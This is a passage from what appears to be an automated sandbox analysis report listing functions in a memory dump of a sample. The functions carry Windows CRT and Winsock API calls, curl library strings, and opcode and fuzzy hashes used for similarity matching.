                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free$fclose$CleanupFreeLibrary
                                    • String ID:
                                    • API String ID: 3795980997-0
                                    • Opcode ID: 6130b7c884ac0ee953a613720da80ee4e86c2b80d59809983674d1486c25102d
                                    • Instruction ID: 41636a3cb2de432659dacd1bd19244bb77d905d22e98116d759d07c169d44e58
                                    • Opcode Fuzzy Hash: 6130b7c884ac0ee953a613720da80ee4e86c2b80d59809983674d1486c25102d
                                    • Instruction Fuzzy Hash: 4801C036602B23EFC7155F62E948108FB71FF04B22B14562BF54466AA1CB70B8E4CBD0
                                    APIs
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000000,00000000,00E0D880), ref: 00E087AC
                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000002,?), ref: 00E087B4
                                    • _getch.API-MS-WIN-CRT-CONIO-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000002,?), ref: 00E087C4
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000002), ref: 00E087EF
                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(00E57668,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00E087FB
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: __acrt_iob_funcfputs$_getch
                                    • String ID:
                                    • API String ID: 3073499726-0
                                    • Opcode ID: ba30c24f7e25f5d1fd08d135b4776fe89159b83911b6996e54344a46e411d575
                                    • Instruction ID: 39008b6c0bdb609a2bbbe7ed65bf91c2f33085538ea5c9aaad188a92f2269130
                                    • Opcode Fuzzy Hash: ba30c24f7e25f5d1fd08d135b4776fe89159b83911b6996e54344a46e411d575
                                    • Instruction Fuzzy Hash: 79F042335007515BC334132C5C09BA6AF54CF8170FF1C163BEAC8F218DC9950C8943A6
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00E029A6), ref: 00E03AA3
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00E029A6), ref: 00E03AB1
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00E029A6), ref: 00E03ABD
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00E029A6), ref: 00E03AC9
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00E029A6), ref: 00E03AD5
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00E029A6), ref: 00E03AE7
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    • Opcode ID: fca1d113035061acf65af7fc88bdb1775383de85eb496503603a234d51ee7166
                                    • Instruction ID: 133a7b27e23acd52601ce0ade66442550ad8370340f1c352c3b826e909164af4
                                    • Opcode Fuzzy Hash: fca1d113035061acf65af7fc88bdb1775383de85eb496503603a234d51ee7166
                                    • Instruction Fuzzy Hash: 9E012139602B009FCA355FA2D85492EBBF5AF44302300490DE89776A60C730A5599F91
                                    APIs
                                      • Part of subcall function 00E1027A: QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?,?,?,?,?,?,00E010B6), ref: 00E1028E
                                      • Part of subcall function 00E1027A: __alldvrm.LIBCMT ref: 00E102A7
                                      • Part of subcall function 00E1027A: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E102D1
                                    • _time64.API-MS-WIN-CRT-TIME-L1-1-0(00000000), ref: 00E0C75B
                                      • Part of subcall function 00E16BA2: calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,0000038F,?,00E0C775), ref: 00E16BC3
                                      • Part of subcall function 00E16BA2: WSACreateEvent.WS2_32 ref: 00E16C4D
                                    Strings
                                    • Transfer aborted due to critical error in another transfer, xrefs: 00E0C87D
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: CounterCreateEventPerformanceQueryUnothrow_t@std@@@__alldvrm__ehfuncinfo$??2@_time64calloc
                                    • String ID: Transfer aborted due to critical error in another transfer
                                    • API String ID: 934473979-1939301410
                                    • Opcode ID: d12222ce37132521e02b8b6a566526c410fcf48cb5b93cd8ace4a13878574018
                                    • Instruction ID: bb4c6eaefecb72f594ec9bb3fd8872677d7bfbe3d696d54b3f5a5f34b92832ca
                                    • Opcode Fuzzy Hash: d12222ce37132521e02b8b6a566526c410fcf48cb5b93cd8ace4a13878574018
                                    • Instruction Fuzzy Hash: FDA1D571D042099FCF15CBA8C4547EDBBF1AF89308F2862AAE855B7291D7709E85CB90
                                    APIs
                                    • inet_pton.WS2_32(00000002,?,?), ref: 00E2EAE7
                                    • inet_pton.WS2_32(00000017,?,?), ref: 00E2EB16
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: inet_pton
                                    • String ID: Hostname %s was found in DNS cache$localhost
                                    • API String ID: 1350483568-3522642687
                                    • Opcode ID: b8a41d52d22eae054e2584a5470ee69457cf27bbc47e3ed2c5ec75991d245e96
                                    • Instruction ID: de236bdda47d7c2cb56848c3fa374656550b9ef9518a1e273189659ebbe7b668
                                    • Opcode Fuzzy Hash: b8a41d52d22eae054e2584a5470ee69457cf27bbc47e3ed2c5ec75991d245e96
                                    • Instruction Fuzzy Hash: 3661D731A002399BDF25DF75E8956FEBBE6AF88324F14502AE805B7391DB705C41CB90
                                    APIs
                                    • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,0000000A), ref: 00E1012E
                                    • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,internal error: invalid pattern type (%d),?), ref: 00E10224
                                    Strings
                                    • internal error: invalid pattern type (%d), xrefs: 00E1021D
                                    • %0*lu, xrefs: 00E1018E
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: __acrt_iob_funcstrtoul
                                    • String ID: %0*lu$internal error: invalid pattern type (%d)
                                    • API String ID: 673873880-449433499
                                    • Opcode ID: b816ba1da8043f1e681aeaf09728a9251f432d3fa8c80f79fb39d11686b94a71
                                    • Instruction ID: 2d7885f55caa17b5e2f917f936a19f3ca9fb08556d72ed21e303b869bcba887f
                                    • Opcode Fuzzy Hash: b816ba1da8043f1e681aeaf09728a9251f432d3fa8c80f79fb39d11686b94a71
                                    • Instruction Fuzzy Hash: 8E512434A05305AFCF18CF64D894AEEBBB1AF08350F14516EE852B7382DBB499C5CB60
                                    APIs
                                    • recvfrom.WS2_32(?,?,?,00000000,?,?), ref: 00E38704
                                    Strings
                                    • Received too short packet, xrefs: 00E3874C
                                    • Internal error: Unexpected packet, xrefs: 00E388AB
                                    • TFTP error: %s, xrefs: 00E38819
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: recvfrom
                                    • String ID: Internal error: Unexpected packet$Received too short packet$TFTP error: %s
                                    • API String ID: 846543921-343195773
                                    • Opcode ID: d7cbdef40d61fc5566342bb75c6ddd370dfb31720e1949ce405373945c9cbae2
                                    • Instruction ID: 4e9a07cc98221f3a07b94d616a2a7442cdaf98b5b9a545e06c4c6cea1f1b92c4
                                    • Opcode Fuzzy Hash: d7cbdef40d61fc5566342bb75c6ddd370dfb31720e1949ce405373945c9cbae2
                                    • Instruction Fuzzy Hash: 9F51E5716002119FDB1C9A388E99BB9FBE5BF44314F445269F85EF6282DB34A944CB90
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,00000000,00000000,blobpointer,?,?,?,?,?,?,?,?), ref: 00E0EA46
                                    • isprint.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?), ref: 00E0EAF7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: isprintmalloc
                                    • String ID: \x%02x$blobpointer
                                    • API String ID: 3792030756-13518461
                                    • Opcode ID: a48df15ef17fa87281f31d3d7d13d5dd65df46365e2d1805aff8128995c9ac28
                                    • Instruction ID: 3398845211e3eb21fe775b55100db1f9bd932bc528ea80042117502bd0e22b53
                                    • Opcode Fuzzy Hash: a48df15ef17fa87281f31d3d7d13d5dd65df46365e2d1805aff8128995c9ac28
                                    • Instruction Fuzzy Hash: 6F412C39F042469EDB254F69A8406EABBB1BF18358F2C197AE4A5F33D1D6704D85CB10
                                    APIs
                                    • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?), ref: 00E0F70B
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004), ref: 00E0F738
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E0F750
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: _strdupmallocrealloc
                                    • String ID: out of memory
                                    • API String ID: 178021264-2599737071
                                    • Opcode ID: 541de1f666dc5d9741deee2bff73761884a2dfeed26967f5854509bbd5531e92
                                    • Instruction ID: 0c544bdc3b43a7b46ad4fe8a58889d230aacf155bd101555159a5d653e8942f2
                                    • Opcode Fuzzy Hash: 541de1f666dc5d9741deee2bff73761884a2dfeed26967f5854509bbd5531e92
                                    • Instruction Fuzzy Hash: 7451BD78514202CFDB25CF38C4947A6BBF0FF05308F1894AAD84AEBB91D3719991CB51
                                    APIs
                                    • calloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00E4020F,00E2EB2F,?), ref: 00E40075
                                    • htons.WS2_32(?), ref: 00E400ED
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: callochtons
                                    • String ID: /
                                    • API String ID: 1862224338-1245174789
                                    • Opcode ID: 29dfe8fe04fcc724a1982fb7f644c7474348beb499c107dd566cf8e57b604cb4
                                    • Instruction ID: 82e5786b3f154b0262ad55a9c0b19c1eed43a2760c856fc246d15bcc582a4bf2
                                    • Opcode Fuzzy Hash: 29dfe8fe04fcc724a1982fb7f644c7474348beb499c107dd566cf8e57b604cb4
                                    • Instruction Fuzzy Hash: 11414B75A0060ADFDF08CF99D891AAEBBB1FF48314B14846ED905AB351D771EE41CB90
                                    APIs
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E23A7C
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E23ABF
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E23AE8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000003.00000002.1638835568.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                    • Associated: 00000003.00000002.1638798426.0000000000E00000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639626412.0000000000E6F000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000003.00000002.1639655045.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_2_e00000_TNheBOJElq.jbxd
                                    Similarity
                                    • API ID: ___from_strstr_to_strchr
                                    • String ID: |l
                                    • API String ID: 601868998-4290992307
                                    APIs
                                    • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0(00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,00E15BA6,00000001), ref: 00E15428
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00E15BA6,00000001), ref: 00E1543B
                                    Strings
                                    Similarity
                                    • API ID: _errnostrtoul
                                    • String ID: %u.%u.%u.%u$0kv@qv@/lv
                                    • API String ID: 660391088-3399269099
                                    APIs
                                    • CertFreeCertificateContext.CRYPT32(00000000), ref: 00E4657A
                                    Strings
                                    • SSL: public key does not match pinned public key, xrefs: 00E4653D
                                    • schannel: Failed to read remote certificate context: %s, xrefs: 00E46561
                                    • SSL: failed retrieving public key from server certificate, xrefs: 00E4654C
                                    Similarity
                                    • API ID: CertCertificateContextFree
                                    • String ID: SSL: failed retrieving public key from server certificate$SSL: public key does not match pinned public key$schannel: Failed to read remote certificate context: %s
                                    • API String ID: 3080675121-2322844371
                                    APIs
                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(00000023,?,?,00000100,%*s,?,00E56DB0), ref: 00E01A92
                                    Strings
                                    Similarity
                                    • API ID: fputs
                                    • String ID: #$%*s$-=O=-
                                    • API String ID: 1795875747-742414071
                                    APIs
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E1F7A7
                                    • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 00E1F7F9
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E1F825
                                    Strings
                                    Similarity
                                    • API ID: ___from_strstr_to_strchrfreestrncmp
                                    • String ID: 0)
                                    • API String ID: 3934053969-3456779764
                                    APIs
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E22326
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00E22383
                                    Strings
                                    • Too old connection (%ld seconds since creation), disconnect it, xrefs: 00E223A3
                                    • Too old connection (%ld seconds idle), disconnect it, xrefs: 00E22342
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                    • String ID: Too old connection (%ld seconds idle), disconnect it$Too old connection (%ld seconds since creation), disconnect it
                                    • API String ID: 885266447-3566769605
                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: __alldvrm
                                    • String ID: "%s":$"%s":null$%I64u.%06I64u
                                    • API String ID: 65215352-1521088119
                                    APIs
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 00E10A07
                                    • strtoll.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,?,?), ref: 00E10A4D
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 00E10A65
                                    Strings
                                    Similarity
                                    • API ID: _errno$strtoll
                                    • String ID: 0kv@qv@/lv
                                    • API String ID: 146016610-1424214619
                                    APIs
                                    • GetEnvironmentVariableA.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00000000,00000001,?,?,?,00E28727,?,?,00000000,?,?,?,00E28849,00000000,?), ref: 00E12698
                                    • realloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E27EE5,?,?,?,00E28727,?,?,00000000,?,?,?,00E28849,00000000,?,?), ref: 00E126C4
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E28849,00000000,?,?,?,00E12373,?,?,?,?,00E016C6,?,00200030), ref: 00E126DF
                                    Strings
                                    Similarity
                                    • API ID: EnvironmentVariablefreerealloc
                                    • String ID: CURL_SSL_BACKEND
                                    • API String ID: 3604909764-3552431867
                                    APIs
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E0D58E
                                    • strtod.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?), ref: 00E0D59C
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E0D5A7
                                    Strings
                                    Similarity
                                    • API ID: _errno$strtod
                                    • String ID: 0kv@qv@/lv
                                    • API String ID: 3632641845-1424214619
                                    APIs
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E0D511
                                    • strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,?), ref: 00E0D522
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E0D52D
                                    Strings
                                    Similarity
                                    • API ID: _errno$strtol
                                    • String ID: 0kv@qv@/lv
                                    • API String ID: 3596500743-1424214619
                                    APIs
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(00000000,HTTP,?,?), ref: 00E4AE0A
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4AE21
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00E4AE3D
                                    Strings
                                    Similarity
                                    • API ID: free$_strdup
                                    • String ID: %s/%s
                                    • API String ID: 2653869212-2758257063
                                    APIs
                                    • send.WS2_32(?,000000FF,00000003,00000000), ref: 00E3E8AE
                                    • WSAGetLastError.WS2_32(?,?,?,00E3E787,00000000), ref: 00E3E8B8
                                    Strings
                                    Similarity
                                    • API ID: ErrorLastsend
                                    • String ID: SENT$Sending data failed (%d)
                                    • API String ID: 1802528911-3459338696
                                    APIs
                                    • _read.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?), ref: 00E01F24
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E01F32
                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00E01F3D
                                    Strings
                                    Similarity
                                    • API ID: _errno$_read
                                    • String ID: 0kv@qv@/lv
                                    • API String ID: 530745434-1424214619
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00000017,00000017,?,00E2EB2F,?,?,?,?,?), ref: 00E4016B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00E1E01D,00000000,00000000,?), ref: 00E401A4
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E1E01D), ref: 00E401CA
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E1E01D), ref: 00E40222
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00E1E01D,00000000,00000000,?), ref: 00E40234
                                    Similarity
                                    • API ID: free$malloc
                                    • String ID:
                                    • API String ID: 2190258309-0
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E211DA
                                      • Part of subcall function 00E10D8D: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E10DA4
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E211F3
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21208
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21231
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E21246
                                    Similarity
                                    • API ID: free$malloc
                                    • String ID:
                                    • API String ID: 2190258309-0
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E29633,00000000), ref: 00E4ABCC
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E29633,00000000), ref: 00E4ABFD
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00E29633,00000000), ref: 00E4AC1F
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4AC36
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E4AC50
                                    Similarity
                                    • API ID: free
                                    • String ID:
                                    • API String ID: 1294909896-0
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3DD98
                                    Strings
                                    Similarity
                                    • API ID: free
                                    • String ID: %s%s$Wildcard - "%s" skipped by user$Wildcard - START of "%s"
                                    • API String ID: 1294909896-4272885751
                                    APIs
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3741B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E3759B
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E375B6
                                    Strings
                                    • Failed to alloc scratch buffer, xrefs: 00E37427
                                    Similarity
                                    • API ID: free$malloc
                                    • String ID: Failed to alloc scratch buffer
                                    • API String ID: 2190258309-2192203314
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E36E3D
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E36F1D
                                    Strings
                                    Similarity
                                    • API ID: free
                                    • String ID: .
                                    • API String ID: 1294909896-916926321
                                    APIs
                                    • getaddrinfo.WS2_32(?,?,?,?), ref: 00E3FEC0
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?), ref: 00E3FF44
                                    • freeaddrinfo.WS2_32(00000000,?,?), ref: 00E3FFCE
                                    • WSASetLastError.WS2_32(00002AF9,?,?), ref: 00E3FFF2
                                    Similarity
                                    • API ID: ErrorLastfreeaddrinfogetaddrinfomalloc
                                    • String ID:
                                    • API String ID: 2354400463-0
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E2C7FA
                                    Strings
                                    • Connection died, tried %d times before giving up, xrefs: 00E2C759
                                    • Connection died, retrying a fresh connect (retry count: %d), xrefs: 00E2C777
                                    • REFUSED_STREAM, retrying a fresh connect, xrefs: 00E2C72F
                                    Similarity
                                    • API ID: free
                                    • String ID: Connection died, retrying a fresh connect (retry count: %d)$Connection died, tried %d times before giving up$REFUSED_STREAM, retrying a fresh connect
                                    • API String ID: 1294909896-4242497519
                                    APIs
                                      • Part of subcall function 00E03857: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,000000FF,?,00000000,?), ref: 00E03872
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00E41B96
                                    Strings
                                    • Mailbox UIDVALIDITY has changed, xrefs: 00E41BDE
                                    • OK [UIDVALIDITY %19[0123456789]], xrefs: 00E41B68
                                    • Select failed, xrefs: 00E41C32
                                    Similarity
                                    • API ID: __stdio_common_vsscanffree
                                    • String ID: Mailbox UIDVALIDITY has changed$OK [UIDVALIDITY %19[0123456789]]$Select failed
                                    • API String ID: 2458389622-3309259123
                                    APIs
                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,00000000,Failed to create/open output), ref: 00E0909C
                                    • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?), ref: 00E090D7
                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(00E57668,?), ref: 00E090E8
                                    • fputs.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?), ref: 00E09107
                                    Similarity
                                    • API ID: fputs$fwrite
                                    • String ID:
                                    • API String ID: 2206100360-0
                                    APIs
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E30489
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E30499
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E304A8
                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00E2A507), ref: 00E304DD
                                    Similarity
                                    • API ID: ___from_strstr_to_strchr$malloc
                                    • String ID:
                                    • API String ID: 383369926-0
                                    APIs
                                    • fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000100), ref: 00E0D370
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E0D386
                                    • ___from_strstr_to_strchr.LIBCMT ref: 00E0D39C
                                    • fgets.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000100), ref: 00E0D3DF
                                    Similarity
                                    • API ID: ___from_strstr_to_strchrfgets
                                    • String ID:
                                    • API String ID: 4248516992-0
                                    APIs
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E0661C
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E06636
                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00E06651
                                    • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 00E0666B
